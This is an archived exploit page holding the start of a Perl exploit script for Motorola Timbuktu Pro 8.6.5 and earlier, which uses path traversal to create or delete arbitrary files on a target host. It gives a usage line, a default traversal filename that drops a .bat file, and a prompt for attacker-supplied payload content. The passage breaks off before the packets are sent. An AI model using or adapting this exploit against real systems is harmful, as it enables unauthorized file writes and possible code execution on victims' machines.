[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit
# Published : 2008-03-11
# Author : titon
# Previous Title : Dovecot IMAP 1.0.10 <= 1.1rc2 Remote Email Disclosure Exploit
# Next Title : MDaemon IMAP server 9.6.4 (FETCH) Remote Buffer Overflow Exploit
#!/usr/bin/perl
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
# Timbuktu Pro <= 8.6.5 Arbitrary File Deletion/Creation
#
# Bug & Exploit by titon [titon{at}bastardlabs{dot}com]
#
# Advisory:
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590
#
# Copyright: (c)2007 BastardLabs
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
#
# Usage: $ ./timbuktu_sploit.pl 192.168.0.69 407
#
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
use IO::Socket;
use Time::HiRes qw(usleep);
##
## we start in the C:Program FilesTimbuktu ProN1 folder
##
$filename = &promptUser("Filename" ,"\../../../pnw3d.bat");
##$filename = &promptUser("Filename" ,"../../../pnw3d.bat");
$payload = &promptUser("Payload ","echo pwwwnnn333ddd !!");
##
##payload can be either text or binary (in x42x69x42 format)
##
$payload =~ s/\x(..)/pack("C",hex($1))/egi;
##
## packet1 == a